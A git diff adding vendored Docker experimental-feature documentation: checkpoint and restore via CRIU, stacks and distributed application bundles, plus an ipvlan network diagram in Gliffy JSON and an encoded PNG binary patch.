sandbox environments. + +The information below describes each feature and the GitHub pull requests and +issues associated with it. If necessary, links are provided to additional +documentation on an issue. As an active Docker user and community member, +please feel free to provide any feedback on these features you wish. + +## Use Docker experimental + +Experimental features are now included in the standard Docker binaries as of +version 1.13.0. +For enabling experimental features, you need to start the Docker daemon with +`--experimental` flag. +You can also enable the daemon flag via `/etc/docker/daemon.json`. e.g. + +```json +{ + "experimental": true +} +``` + +Then make sure the experimental flag is enabled: + +```bash +$ docker version -f '{{.Server.Experimental}}' +true +``` + +## Current experimental features + + * [External graphdriver plugins](../docs/extend/plugins_graphdriver.md) + * [Ipvlan Network Drivers](vlan-networks.md) + * [Docker Stacks and Distributed Application Bundles](docker-stacks-and-bundles.md) + * [Checkpoint & Restore](checkpoint-restore.md) + +## How to comment on an experimental feature + +Each feature's documentation includes a list of proposal pull requests or PRs associated with the feature. If you want to comment on or suggest a change to a feature, please add it to the existing feature PR. + +Issues or problems with a feature? Inquire for help on the `#docker` IRC channel or on the [Docker Google group](https://groups.google.com/forum/#!forum/docker-user). diff --git a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md new file mode 100644 index 0000000000..7e609b60ec --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md @@ -0,0 +1,88 @@ +# Docker Checkpoint & Restore + +Checkpoint & Restore is a new feature that allows you to freeze a running +container by checkpointing it, which turns its state into a collection of files +on disk. Later, the container can be restored from the point it was frozen. + +This is accomplished using a tool called [CRIU](http://criu.org), which is an +external dependency of this feature. A good overview of the history of +checkpoint and restore in Docker is available in this +[Kubernetes blog post](http://blog.kubernetes.io/2015/07/how-did-quake-demo-from-dockercon-work.html). + +## Installing CRIU + +If you use a Debian system, you can add the CRIU PPA and install with apt-get +[from the criu launchpad](https://launchpad.net/~criu/+archive/ubuntu/ppa). + +Alternatively, you can [build CRIU from source](http://criu.org/Installation). + +You need at least version 2.0 of CRIU to run checkpoint/restore in Docker. + +## Use cases for checkpoint & restore + +This feature is currently focused on single-host use cases for checkpoint and +restore. Here are a few: + +- Restarting the host machine without stopping/starting containers +- Speeding up the start time of slow start applications +- "Rewinding" processes to an earlier point in time +- "Forensic debugging" of running processes + +Another primary use case of checkpoint & restore outside of Docker is the live +migration of a server from one machine to another. This is possible with the +current implementation, but not currently a priority (and so the workflow is +not optimized for the task). + +## Using checkpoint & restore + +A new top level command `docker checkpoint` is introduced, with three subcommands: +- `create` (creates a new checkpoint) +- `ls` (lists existing checkpoints) +- `rm` (deletes an existing checkpoint) + +Additionally, a `--checkpoint` flag is added to the container start command. + +The options for checkpoint create: + + Usage: docker checkpoint create [OPTIONS] CONTAINER CHECKPOINT + + Create a checkpoint from a running container + + --leave-running=false Leave the container running after checkpoint + --checkpoint-dir Use a custom checkpoint storage directory + +And to restore a container: + + Usage: docker start --checkpoint CHECKPOINT_ID [OTHER OPTIONS] CONTAINER + + +A simple example of using checkpoint & restore on a container: + + $ docker run --security-opt=seccomp:unconfined --name cr -d busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done' + > abc0123 + + $ docker checkpoint create cr checkpoint1 + + # + $ docker start --checkpoint checkpoint1 cr + > abc0123 + +This process just logs an incrementing counter to stdout. If you `docker logs` +in between running/checkpoint/restoring you should see that the counter +increases while the process is running, stops while it's checkpointed, and +resumes from the point it left off once you restore. + +## Current limitation + +seccomp is only supported by CRIU in very up to date kernels. + +External terminal (i.e. `docker run -t ..`) is not supported at the moment. +If you try to create a checkpoint for a container with an external terminal, +it would fail: + + $ docker checkpoint create cr checkpoint1 + Error response from daemon: Cannot checkpoint container c1: rpc error: code = 2 desc = exit status 1: "criu failed: type NOTIFY errno 0\nlog file: /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log\n" + + $ cat /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log + Error (mount.c:740): mnt: 126:./dev/console doesn't have a proper root mount + diff --git a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md new file mode 100644 index 0000000000..b777c3919c --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md @@ -0,0 +1,202 @@ +# Docker Stacks and Distributed Application Bundles + +## Overview + +Docker Stacks and Distributed Application Bundles are experimental features +introduced in Docker 1.12 and Docker Compose 1.8, alongside the concept of +swarm mode, and Nodes and Services in the Engine API. + +A Dockerfile can be built into an image, and containers can be created from +that image. Similarly, a docker-compose.yml can be built into a **distributed +application bundle**, and **stacks** can be created from that bundle. In that +sense, the bundle is a multi-services distributable image format. + +As of Docker 1.12 and Compose 1.8, the features are experimental. Neither +Docker Engine nor the Docker Registry support distribution of bundles. + +## Producing a bundle + +The easiest way to produce a bundle is to generate it using `docker-compose` +from an existing `docker-compose.yml`. Of course, that's just *one* possible way +to proceed, in the same way that `docker build` isn't the only way to produce a +Docker image. + +From `docker-compose`: + +```bash +$ docker-compose bundle +WARNING: Unsupported key 'network_mode' in services.nsqd - ignoring +WARNING: Unsupported key 'links' in services.nsqd - ignoring +WARNING: Unsupported key 'volumes' in services.nsqd - ignoring +[...] +Wrote bundle to vossibility-stack.dab +``` + +## Creating a stack from a bundle + +A stack is created using the `docker deploy` command: + +```bash +# docker deploy --help + +Usage: docker deploy [OPTIONS] STACK + +Create and update a stack from a Distributed Application Bundle (DAB) + +Options: + --file string Path to a Distributed Application Bundle file (Default: STACK.dab) + --help Print usage + --with-registry-auth Send registry authentication details to Swarm agents +``` + +Let's deploy the stack created before: + +```bash +# docker deploy vossibility-stack +Loading bundle from vossibility-stack.dab +Creating service vossibility-stack_elasticsearch +Creating service vossibility-stack_kibana +Creating service vossibility-stack_logstash +Creating service vossibility-stack_lookupd +Creating service vossibility-stack_nsqd +Creating service vossibility-stack_vossibility-collector +``` + +We can verify that services were correctly created: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility-stack_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility-stack_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility-stack_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility-stack_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility-stack_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility-stack_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## Managing stacks + +Stacks are managed using the `docker stack` command: + +```bash +# docker stack --help + +Usage: docker stack COMMAND + +Manage Docker stacks + +Options: + --help Print usage + +Commands: + config Print the stack configuration + deploy Create and update a stack + ls List stacks + rm Remove the stack + services List the services in the stack + tasks List the tasks in the stack + +Run 'docker stack COMMAND --help' for more information on a command. +``` + +## Bundle file format + +Distributed application bundles are described in a JSON format. When bundles +are persisted as files, the file extension is `.dab` (Docker 1.12RC2 tools use +`.dsb` for the file extension—this will be updated in the next release client). + +A bundle has two top-level fields: `version` and `services`. The version used +by Docker 1.12 tools is `0.1`. + +`services` in the bundle are the services that comprise the app. They +correspond to the new `Service` object introduced in the 1.12 Docker Engine API. + +A service has the following fields: + +
+
+ Image (required) string +
+
+ The image that the service will run. Docker images should be referenced + with full content hash to fully specify the deployment artifact for the + service. Example: + postgres@sha256:f76245b04ddbcebab5bb6c28e76947f49222c99fec4aadb0bb + 1c24821a 9e83ef +
+
+ Command []string +
+
+ Command to run in service containers. +
+
+ Args []string +
+
+ Arguments passed to the service containers. +
+
+ Env []string +
+
+ Environment variables. +
+
+ Labels map[string]string +
+
+ Labels used for setting meta data on services. +
+
+ Ports []Port +
+
+ Service ports (composed of Port (int) and + Protocol (string). A service description can + only specify the container port to be exposed. These ports can be + mapped on runtime hosts at the operator's discretion. +
+ +
+ WorkingDir string +
+
+ Working directory inside the service containers. +
+ +
+ User string +
+
+ Username or UID (format: <name|uid>[:<group|gid>]). +
+ +
+ Networks []string +
+
+ Networks that the service containers should be connected to. An entity + deploying a bundle should create networks as needed. +
+
+ +The following is an example of bundlefile with two services: + +```json +{ + "Version": "0.1", + "Services": { + "redis": { + "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", + "Networks": ["default"] + }, + "web": { + "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", + "Networks": ["default"], + "User": "web" + } + } +} +``` diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy new file mode 100644 index 0000000000..bf0512af76 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":447,"height":422,"nodeIndex":326,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":9,"y":10.461511948529278},"max":{"x":447,"y":421.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":12.0,"y":200.0,"rotation":0.0,"id":276,"width":434.00000000000006,"height":197.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":275.0,"y":8.93295288085936,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":14,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[82.0,295.5670471191406],[-4.628896294384617,211.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":285.0,"y":18.93295288085936,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":15,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":316,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-204.0,285.5670471191406],[-100.37110370561533,201.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":203.5,"rotation":0.0,"id":267,"width":116.0,"height":16.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":16,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":28.93295288085936,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":17,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":290,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[217.5,167.06704711914062],[219.11774189711457,53.02855906766992]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":57.51435447730654,"y":10.461511948529278,"rotation":0.0,"id":246,"width":343.20677483961606,"height":143.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":18,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":55.19999694824217,"rotation":0.0,"id":262,"width":262.0,"height":75.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":22,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Unless notified about the container networks, the physical network does not have a route to their subnets

Who has 10.16.20.0/24?

Who has 10.1.20.0/24?

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.0,"y":403.5,"rotation":0.0,"id":282,"width":442.0,"height":18.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers can be on different subnets and reach each other

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":252.5,"rotation":0.0,"id":288,"width":238.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Ipvlan L3 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":172.0,"rotation":0.0,"id":290,"width":207.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":3.568965517241383,"y":0.0,"rotation":0.0,"id":291,"width":199.86206896551747,"height":42.0,"uid":null,"order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Eth0

192.168.50.10/24

Parent interface acts as a Router

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":29.0,"y":358.1999969482422,"rotation":0.0,"id":304,"width":390.99999999999994,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

All containers can ping each other without a router if

they share the same parent interface (example eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":24.0,"y":276.0,"rotation":0.0,"id":320,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":48,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":316,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":317,"width":109.44000000000001,"height":43.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 

172.16.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":318,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":319,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":300.0,"y":276.0,"rotation":0.0,"id":321,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":49,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":272,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":273,"width":109.44000000000001,"height":44.0,"uid":null,"order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":310,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":312,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":85.93295288085938,"rotation":0.0,"id":322,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":50,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#434343","fillColor":"none","dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-191.0,222.06704711914062],[-80.9272967534639,222.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.0,"y":25.499999999999986,"rotation":0.0,"id":323,"width":135.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":51,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Physical Network

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":53}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#434343","strokeWidth":2,"dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"orthoMode":2}},"textStyles":{"global":{"face":"Arial","size":"13px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117032939,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png new file mode 100644 index 0000000000000000000000000000000000000000..3227a83ca1541ec68e06b0aa105e22fdf5ae9e6f GIT binary patch literal 18260 zcmaI6Wl$YmumyT>5AG1$-Q67ydXV7m8r+1pok>`#RfTA-*)bij0K-0C)TQ9yW|^N>XfP5?S3O{d6!$!B8y2koK&0EoKg z14FAa8wP53UX5(L=%bDVL&q0#^aP6T-8%nWjl|N@0|HYEm_x>-zYG8X+2Wz0n@ zzI=J7-uZdIPqutrz|x1Ai?3;VhTlje(*-0XDKBVe#9*5bMa}EV0b?Ns0MG@0Ui2`_ zyA_7pwKNt+WmVFd);j7*KV7ZMKpvgIJVpRB zk%B`-b-EM-07kw-z$Bs2hOsF>sATd?h@Xx{3=r`1M{l@jXOaH_z4MhL$3kWlz_!oll8RWh!Q%ROqdsGnb z(TIUiKA{RJOZ(q_NwQH7TH06B6ls}!%=IAY1^)X7pr@=O1Q$j*e|F|%#TA_w-Y;kC z)_`zJ#`9NCCW{OdMugwWB?QLTkvyi0WxiQ_#T0~ZQXY15j6v3s1PYv2ei$9RP7duU zqHT!9#~0bi?!lGe=?X6%oIH~_-Z`^`G@SyH#Q}0r7>^JBu!Keq-(wCBenOz|2O&fP z%g(=xOm2N&(JGPhAZ&+bB(oa!l?)rZAHYn!%X6=Q?12*Z=-5I<(n;+L6OzT~%aEvO zgv8_ogMJaz{p`T;w{DzN-7~1pVqIlvWlRHg>_wsK z+@e+a#w-GRB!9D%P4X!uI$n1QEJo%7!P9sat=Yi+8?`ar93aXXi7MWN=hA*yn@Ikk z4&`q8r987}hlINhTR;^mdxMx-+>@>TP$>)3LgwW~Dq;mQ#%#p8{3(LFu9AB9%YwlX zX^Jt4C~j&qDj?O8cx?i0hwDmDi>9@%F0a|XWrlKxLu-fY0YY#dF;{(Xz#B^()XVp~ zA+#qOWF3Pblb9U2Xb05_fp~})4vZ# zE$5YiKsXBY*+b>07f3O)+SciM@ArFu`gqLyfO499UTM3S_#0RA)ci8kaC()t{CdH{ zUsheO{k`w`&G72YZ?(N1(zlZBufdwTu4o5M#we0nv6WmAo=8Wu(MTcf4Y?&QG)0oU znn9uhM0uu(8;#a5mXez3LPqk*Z#>J&vJ<;CvtdznTbY7$yAnJkFbEtY;(+bo<^Jk( zA>&D(D;*-QXyd%8x~=Fqj7_gcZx1elO`pe&sgB2$F=5#aF7~q%`{`%x&~7&!Hn|YE;!;Q?f*HvOpP-Tm=35u|Ah?>^rxk9yuVL1k zkP^ZRJesL>xg0b!OlMvo;5~)DutD19qHL%dXWPo&|3$Fk!83qR$Kc!-p}nmF?BkD*xxZZfVH1jrnX&-rzd4 zB9>wgQ1hSXV;Ch*6{l5Ws3&5^Z!QG)EfD;%2R=$vYzyZBIc4%=<%&9Uj*)QAJ~z^( zFcF@R^!oic!@aLO^ 